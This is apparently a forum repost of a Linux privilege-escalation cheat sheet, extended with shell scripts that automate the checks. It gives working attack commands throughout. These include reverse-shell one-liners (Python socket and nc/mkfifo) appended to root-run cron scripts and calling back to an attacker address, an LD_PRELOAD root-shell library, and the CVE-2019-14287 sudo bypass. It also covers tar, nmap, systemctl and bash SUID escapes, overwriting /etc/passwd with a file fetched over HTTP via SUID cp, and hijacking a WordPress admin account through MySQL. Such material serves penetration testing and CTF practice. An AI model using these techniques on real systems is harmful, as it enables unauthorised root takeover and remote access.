National Cyber Warfare Foundation (NCWF) Forums

Linux privilege escalation made easy

2020-08-17 09:06:28
Red Team (CNA)

Linux Privilege Escalation: Quick and Dirty

A quick and dirty Linux Privilege Escalation cheat sheet. I have utilized all of these privilege escalation techniques at least once.

Published on Aug 10, 2020

Automated Tooling
Usually, my approach is to use an automated tool in conjunction with
some manual enumeration. However, you can completely accomplish the
Privilege Escalation process from an automated tool paired with the
right exploitation methodology.

1. (my go-to, fully automated)

2. (my backup)

3. (To look for those sneaky little Kernel Exploits)


Keep in mind that these are just some of the techniques I have used.
You’ll find that some of the existing Linux privilege escalation guides
are much more comprehensive:

1. The Holy Grail

2. My Second Favorite Guide

3. GTFOBins (The most comprehensive binary privesc guide)


God Mode

history

I know, seems crazy, the history command? Why? Well, I’ve successfully performed privilege escalation from finding hints or credentials in the user’s history.

In a non-interactive shell (a reverse shell, say) the history builtin is usually empty, so read the files themselves: ~/.bash_history, plus ~/.mysql_history and ~/.python_history where they exist, and the same files under any other home directory you can read.

Capabilities

If a binary carries a capability with the effective bit set (the getcap -r / listing shows it as +ep), the command might be able to be abused. cap_setuid is the obvious one: the program may call setuid(0) itself and then spawn a shell, which is trivial from an interpreter such as python or perl. A capability that is only permitted (=p) is not enough, because the program would have to raise it on its own.

/usr/bin/python2.6 = cap_setuid+ep

For instance, I used this cheat sheet for capability exploits
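The capability check above, as an added example that is not part of the original post: a small triage script that reads the output of getcap -r / and flags the capabilities that lead directly to root, with the escalation to try for each. The getcap listing inside it is constructed for the demo, and the list of "dangerous" capabilities is an assumed shortlist, not the full picture.

```sh
#!/bin/sh
# Added example, not from the original post: triage the output of
#   getcap -r / 2>/dev/null
# for file capabilities that lead straight to root. The sample listing below is
# constructed for the demo; on a target, pipe the real getcap output into flag_caps.

# Capabilities worth flagging (assumed shortlist, not exhaustive) and why:
#   cap_setuid / cap_setgid   the binary may call setuid(0)/setgid(0) itself
#   cap_dac_override          file permission checks are skipped (read shadow, write passwd)
#   cap_dac_read_search       read any file (shadow, private keys)
#   cap_sys_admin             mount and many other privileged operations
#   cap_sys_ptrace            attach to / inject into root processes
DANGEROUS='cap_setuid|cap_setgid|cap_dac_override|cap_dac_read_search|cap_sys_admin|cap_sys_ptrace'

# flag_caps: read getcap lines on stdin, print "<binary> <capability>" for every
# dangerous capability that is Effective. A capability that is only Permitted
# ("=p") is skipped: the program would have to raise it itself, which python,
# perl and friends never do. Both the older "path = cap_x+ep" and the newer
# libcap "path cap_x=ep" formats are handled.
flag_caps() {
    awk -v pat='^('"$DANGEROUS"')$' '
    {
        for (i = 2; i <= NF; i++) {
            tok = $i
            if (tok == "=") continue              # separator in the old format
            if (match(tok, /[+=]/) == 0) continue # no flag set on this token
            names = substr(tok, 1, RSTART - 1)    # "cap_a,cap_b"
            flags = substr(tok, RSTART + 1)       # "ep", "eip", "p", ...
            if (index(flags, "e") == 0) continue
            n = split(names, cap, ",")
            for (j = 1; j <= n; j++) if (cap[j] ~ pat) print $1, cap[j]
        }
    }'
}

# cap_hint CAP BINARY: what to try for a flagged capability.
cap_hint() {
    case $1 in
        cap_setuid)
            case $2 in
                *python*) echo "$2 -c 'import os; os.setuid(0); os.system(\"/bin/sh\")'" ;;
                *)        echo "$2: call setuid(0) then spawn a shell (GTFOBins, capabilities)" ;;
            esac ;;
        cap_dac_override|cap_dac_read_search)
            echo "$2: open /etc/shadow (and write /etc/passwd with dac_override) regardless of mode bits" ;;
        *)
            echo "$2 [$1]: see GTFOBins for this capability" ;;
    esac
}

# report_caps: flag_caps plus a hint per finding.
report_caps() {
    flag_caps | while read -r bin cap; do
        echo "$bin [$cap]: $(cap_hint "$cap" "$bin")"
    done
}

# Constructed getcap output for the demo (the python2.6 line matches the one above).
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.6 = cap_setuid+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/bin/perl cap_setuid=p
/usr/bin/vim.basic = cap_dac_override+ep'

demo_flag_caps()   { printf '%s\n' "$SAMPLE_GETCAP" | flag_caps; }
demo_report_caps() { printf '%s\n' "$SAMPLE_GETCAP" | report_caps; }
```

On the sample, demo_flag_caps reports only python2.6 (cap_setuid) and vim.basic (cap_dac_override); ping and tcpdump carry harmless network capabilities and perl is skipped because its cap_setuid is permitted but not effective.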


Changing WordPress Password via MySQL DB
I came across a situation in which taking over the WordPress website was
essentially part of the privilege escalation process due to versioning.

  1. Find the MySQL credentials (WordPress keeps them in wp-config.php as DB_NAME, DB_USER and DB_PASSWORD)
  2. Connect to the local database:

mysql -h localhost -u user -p

  3. Authenticate using the credentials you found
  4. Select the database that holds the users table (the name from wp-config.php):

USE databasename;

  5. Change the admin password, or the password of any user you want to log in as:

UPDATE wp_users SET user_pass=MD5('NewPassword123!') WHERE user_login='wpadmin';

  6. KEY: wp_users is the table (wp_ is the default table prefix and may differ
    on this install), user_pass is the password column, and user_login is
    the username column. Use MD5(), not MySQL’s PASSWORD(): WordPress never
    verifies MySQL-native hashes, but for backwards compatibility it accepts
    a plain MD5 hash and rehashes it with its own phpass scheme on the next
    successful login.

Permissive Root Script
If a cron job is running a script as root (check /etc/crontab, /etc/cron.d/*
and the /etc/cron.hourly style directories), determine what the script is
doing. If you have write permission on the script, you’re golden: append a
payload and wait for the next run.
Note: the >> in the one-liner echo appends your payload to the script. A single
> would overwrite the whole file, which also breaks whatever the job was
supposed to do and is far more noticeable.

Two of my favorite examples (<attacker-ip> is your listener address and
<script> the path of the root-run script; both were stripped from the
original and are placeholders here):

Python One-Liner (if the script is Python)

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> <script>

Bash One-Liner (If the script is a .sh)

echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attacker-ip> 7242 > /tmp/f" >> <script>

Now set up a listener on the defined port (nc -lvnp 4444, or 7242 for the
bash version), and wait for the script to run.

LD_PRELOAD via sudo

In some circumstances sudo is configured to keep the LD_PRELOAD environment
variable (env_keep). The dynamic loader honours LD_PRELOAD before the
program’s own code runs, so any command you are allowed to sudo will load a
shared object of your choosing as root.

  1. Run:

sudo -l

  2. If env_keep+=LD_PRELOAD appears under the "Matching Defaults entries",
    make a C file named shell.c (or whatever you want):

nano shell.c

  3. Place the following code in it:

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>

    /* _init runs when the library is loaded, before main() of the sudo'd program */
    void _init() {
        unsetenv("LD_PRELOAD");   /* stop the shell we spawn from preloading us again */
        setgid(0);
        setuid(0);
        system("/bin/bash -p");
    }

  4. Compile it as a shared library (the output file is shell.so;
    -nostartfiles keeps the C runtime from supplying its own _init):

gcc -fPIC -shared -nostartfiles -o shell.so shell.c

  5. Pick any binary that sudo -l lets you run as root, for instance
    apache2, and run it with LD_PRELOAD pointing at your library. The library
    has to sit somewhere root can read it. Your shell runs before apache2’s
    main() ever does, escalating your current shell to a root level shell:

sudo LD_PRELOAD=/home/user/shell.so apache2

Bash SUID

This one absolutely blew my mind, I used it recently. If you find a private
SSH key and you can log in with it, check whether /bin/bash has the SUID bit
set (it appears in a find / -perm -4000 listing, or as rwsr-xr-x in ls -l
/bin/bash). If you have it, you might be able to escalate during
authentication! bash -p tells bash to keep its effective uid instead of
dropping back to your real uid, so the shell ssh hands you runs as root
(<target-ip> is a placeholder for the host):

ssh -i id_rsa user@<target-ip> bash -p

Lua Privilege Escalation

This is another one of those strange one-off scenarios. I had a script that
allowed me to drop into a little command prompt and run different commands as
root (but most of them would just print the word “nil”). I had no idea what
was happening. After a little research, I found out that nil was Lua’s
version of null (basically the error was telling me that it was attempting
to use Lua commands but the commands used did not exist) and the prompt I
was using was some sort of Lua script. Jokingly, I typed the following:


I was root!!

For reference, Lua’s standard library reaches the operating system through
os.execute(), so a Lua prompt that runs as root spawns a root shell from
os.execute("/bin/sh"); GTFOBins lists the same entry for lua.

Sudo Bypass

I noticed the following entry, (ALL, !root) /bin/bash, upon running:

sudo -l

I had root permissions to run bash, an obvious win! Attempting to run
it as the root user would not work. A quick Google search helped me
understand that it was a Sudo Privilege Escalation bypass:

sudo -u#-1 /bin/bash

The rule means "run bash as any user except root". Passing the numeric uid
-1 (or 4294967295) instead of a user name slips past that exclusion and sudo
ends up executing the command as uid 0. This is CVE-2019-14287, fixed in
sudo 1.8.28, so check sudo --version before trying it.
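One script that covers both sudo -l findings discussed above (LD_PRELOAD kept by env_keep, and the (ALL, !root) rule), as an added example that is not part of the original post. It parses sudo -l output, reports the findings together with any NOPASSWD entries, and compares the installed sudo version against the 1.8.28 fix so you know whether -u#-1 is worth trying. The sudo -l text and version strings are constructed for the demo.

```sh
#!/bin/sh
# Added example, not from the original post: triage `sudo -l` output for the two
# findings described above (LD_PRELOAD surviving through env_keep, and an
# "(ALL, !root)" rule, the CVE-2019-14287 case) plus NOPASSWD entries, and check
# whether the installed sudo predates the 1.8.28 fix. The sudo -l text below is
# constructed; on a target: sudo -l 2>/dev/null | sudo_triage

# version_lt A B: succeed if version A is older than B. Dot-separated numeric
# compare; a trailing "p1"-style patch level is ignored (1.8.27p1 < 1.8.28).
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        sub(/p[0-9]+$/, "", a); sub(/p[0-9]+$/, "", b)
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            if (x[i] + 0 < y[i] + 0) exit 0
            if (x[i] + 0 > y[i] + 0) exit 1
        }
        exit 1
    }'
}

# sudo_14287_vulnerable "Sudo version 1.8.27": succeed if that sudo still honours
# -u#-1 (fixed in 1.8.28). Feed it the first line of `sudo --version`.
sudo_14287_vulnerable() {
    v=$(printf '%s\n' "$1" | awk '/^Sudo version/ { print $3 }')
    [ -n "$v" ] && version_lt "$v" 1.8.28
}

# sudo_triage: read `sudo -l` on stdin, print one finding per line.
sudo_triage() {
    while IFS= read -r line; do
        case $line in
            *env_keep*LD_PRELOAD*)
                echo "LD_PRELOAD: kept by env_keep; sudo LD_PRELOAD=/path/shell.so <allowed cmd> loads it as root" ;;
        esac
        case $line in
            *"!root)"*)
                cmd=${line##*\) }
                echo "NOTROOT: $cmd via sudo -u#-1 $cmd (CVE-2019-14287, sudo < 1.8.28 only)" ;;
            *NOPASSWD:*)
                cmd=${line##*NOPASSWD: }
                echo "NOPASSWD: $cmd (look it up in GTFOBins under sudo)" ;;
        esac
    done
}

# Constructed sudo -l output for the demo.
SAMPLE_SUDO_L='Matching Defaults entries for user on target:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User user may run the following commands on target:
    (root) NOPASSWD: /usr/sbin/apache2
    (ALL, !root) /bin/bash'

demo_sudo_triage() { printf '%s\n' "$SAMPLE_SUDO_L" | sudo_triage; }
```

The version comparison is done numerically per component rather than as a string, so 1.8.27p1 sorts before 1.8.28 and 1.9.5p2 after it; a plain string compare would get the second case wrong whenever the number of digits changes.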


Tar via sudo

If sudo -l shows you can run tar as root, it’s an easy win: tar’s checkpoint
action runs an arbitrary command, here a shell:

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

The same trick works against a SUID tar without sudo: call the binary
directly and use exec="/bin/sh -p" so the shell keeps the elevated uid.

TMUX Session Running as Root

I cannot express how many times this one has been overlooked. I’ve
legitimately exploited 5+ systems in CTF-like environments with this
gem. If you see a tmux session running as root, look at the socket path
given with -S. Typically, I’ve seen the session running under /.devs/dev_sess

This can be identified using:

ps aux | grep tmux

If you see that, and a session is active as the root user, attempt an easy
win by attaching through the same socket:

tmux -S /.devs/dev_sess

This only works when the socket’s permissions (ls -l on it) let your user
connect; a root session on its default socket under /tmp/tmux-0/ is not
reachable from another account, which is why an unusual, readable socket
path is the tell. If it works, check your privs! You might just be root.


Nmap Interactive

Yes, another exceedingly simple win if nmap is SUID. Interactive mode only
exists in nmap versions 2.02 through 5.21, so this is a legacy find; inside
the nmap> prompt, !sh drops you to a shell:

nmap --interactive
nmap> !sh

Systemctl SUID

Identifying this beauty represents yet another win. The unit you link is
started by systemd itself, so its ExecStart runs as root no matter who wrote
it; the SUID bit on systemctl is what lets an unprivileged user link and
enable it.

Run each one of these commands in order (use the full path of the SUID
systemctl if it is not the one in your PATH):

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF

systemctl link $TF

systemctl enable --now $TF

Then read /tmp/output: it should contain uid=0(root). Swap the ExecStart
command for whatever you actually want run as root.


Cp SUID

Noticing the ‘cp’ command with the SUID bit set could allow you to overwrite
the passwd file of the victim system, giving yourself root permissions: a
SUID cp writes its destination as root, so the mode bits on /etc/passwd no
longer matter.

  1. Open up a terminal on your attacking machine and create a salted
    password hash (MD5-crypt):

openssl passwd -1 -salt roflroot pass123

  2. Start from the victim’s own /etc/passwd (cat it on the target and save
    the contents locally as passwd). Do not use your attacking machine’s
    passwd file: replacing the target’s file with a foreign one renames or
    removes every existing account on it. Append a root-equivalent user
    (uid 0, gid 0) using the full hash printed in step 1:

roflroot:<hash from step 1>:0:0:root:/root:/bin/bash

  3. Host an HTTP server in that directory (python3 -m http.server 8000 on
    a Python 3 box):

python -m SimpleHTTPServer 8000

  4. Navigate to the /tmp directory on the victim host, or somewhere else
    you have write permissions, and download the edited passwd file
    (<attacker-ip> is a placeholder for your host):

wget http://<attacker-ip>:8000/passwd

  5. Copy it over /etc/passwd with the SUID cp:

cp passwd /etc/passwd

  6. Switch to your created user with the password from step 1:

su roflroot
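The one enumeration step behind the Bash SUID, Tar, Nmap Interactive, Systemctl SUID and Cp SUID sections above, as an added example that is not part of the original post: list SUID binaries, flag the names this cheat sheet has an escalation for, and build the passwd line the cp trick needs. The fake SUID tree is constructed in a temp dir, the hint list is an assumed shortlist (GTFOBins has the full catalogue), and passwd_root_line assumes openssl is installed.

```sh
#!/bin/sh
# Added example, not from the original post: the single check that backs the
# Bash, Tar, Nmap, Systemctl and cp sections above: list SUID binaries and flag the
# names with a known escalation. The demo builds a fake tree of SUID files in a
# temp dir; on a target run: find_suid / | flag_suid

# find_suid ROOT: regular files under ROOT with the setuid bit.
find_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null
}

# suid_hint NAME PATH: escalation to try for a known binary name, nothing otherwise.
# The list is assumed (the ones covered above plus python) and is not exhaustive;
# GTFOBins has the full catalogue.
suid_hint() {
    case $1 in
        bash)      echo "$2 -p" ;;
        cp)        echo "$2 <edited passwd> /etc/passwd  (append a uid-0 user first, see the cp section)" ;;
        tar)       echo "$2 -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=\"/bin/sh -p\"" ;;
        systemctl) echo "$2 link/enable --now a unit whose ExecStart is your command" ;;
        nmap)      echo "$2 --interactive then !sh (nmap 2.02 through 5.21 only)" ;;
        python*)   echo "$2 -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'" ;;
    esac
}

# flag_suid: read paths on stdin, print "<path>: <hint>" for the known ones.
flag_suid() {
    while IFS= read -r path; do
        hint=$(suid_hint "${path##*/}" "$path")
        if [ -n "$hint" ]; then
            echo "$path: $hint"
        fi
    done
}

# passwd_root_line USER PASS SALT: the /etc/passwd line to append for the cp
# trick: MD5-crypt hash from openssl (assumed present), uid 0, gid 0, bash.
passwd_root_line() {
    hash=$(openssl passwd -1 -salt "$3" "$2")
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$hash"
}

# demo_suid_tree: temp dir with fake binaries; bash, cp and ls get the setuid
# bit (ls is setuid but has no hint, tar is a plain 755 file). Prints the dir.
demo_suid_tree() {
    dir=$(mktemp -d)
    for name in bash cp ls tar; do
        printf '#!/bin/sh\nexit 0\n' > "$dir/$name"
        chmod 755 "$dir/$name"
    done
    chmod 4755 "$dir/bash" "$dir/cp" "$dir/ls"
    echo "$dir"
}
```

find_suid "$(demo_suid_tree)" | flag_suid prints a hint for bash and cp only: ls is SUID but harmless on its own, and tar never had the bit. On a real target the same pipeline over / is the first thing to run after landing a shell.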

I hope some of these techniques help you!
If you liked my guide, be sure to follow me on Twitter: @johnjhacking


© Copyright 2012 through 2021 - National Cyber Warfare Foundation - All rights reserved worldwide.